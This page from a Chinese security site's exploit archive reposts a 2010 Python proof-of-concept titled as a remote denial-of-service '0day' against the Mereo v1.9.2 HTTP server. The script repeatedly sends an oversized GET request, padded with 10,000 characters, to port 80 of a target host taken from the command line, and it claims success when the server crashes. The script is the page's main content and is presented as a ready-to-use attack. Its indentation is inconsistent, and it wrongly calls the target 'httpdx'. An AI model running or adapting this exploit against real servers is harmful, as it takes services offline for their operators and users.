首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mereo v1.9.2 Remote HTTP Server Denial Of Service Vulnerability
来源:cwggenius [at] gmail [dot] com 作者:GeNiuS 发布时间:2010-08-31  

#!/usr/bin/python

###########################################################################
#
# Title:    Mereo v1.9.2 Remote HTTP Server DoS (0day)
# By:       CwG GeNiuS
# Email:    cwggenius [at] gmail [dot] com
# Tested:   XPSP3
# Download: http://www.ohloh.net/p/mereo
#
############################################################################


import socket, sys
 
payload ="GET /";
payload+="X" * 10000;
payload+=" HTTP/1.1\r\n\r\n";
count = 1;
 
try:
 while (count < 100):
         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         print ("[*] Connecting to httpdx server.");
         s.connect((sys.argv[1], 80));
         print ("\n[*] Sending command.\n");
         s.send(payload);
         s.close();
   count = count+1;
  print count;
except:
    print "Successfully Crashed!";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows 7 / Vista Backup Utili
·Apple QuickTime "_Marshaled_pU
·Microsoft Internet explorer 8
·Safari for windows Invalid SGV
·web wiz newspad v1.03 Database
·Apple QuickTime 7.6.7 _Marshal
·Microsoft Windows Based Script
·SnackAmp 3.1.2 Malicious SMP B
·Camtasia Studio 7 (mfc90enu.dl
·Spybot-S&D blindman.exe DLL Hi
·flash player 9.exe DLL Hijacki
·MPLAB IDE .mcp .mcw DLL Hijack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved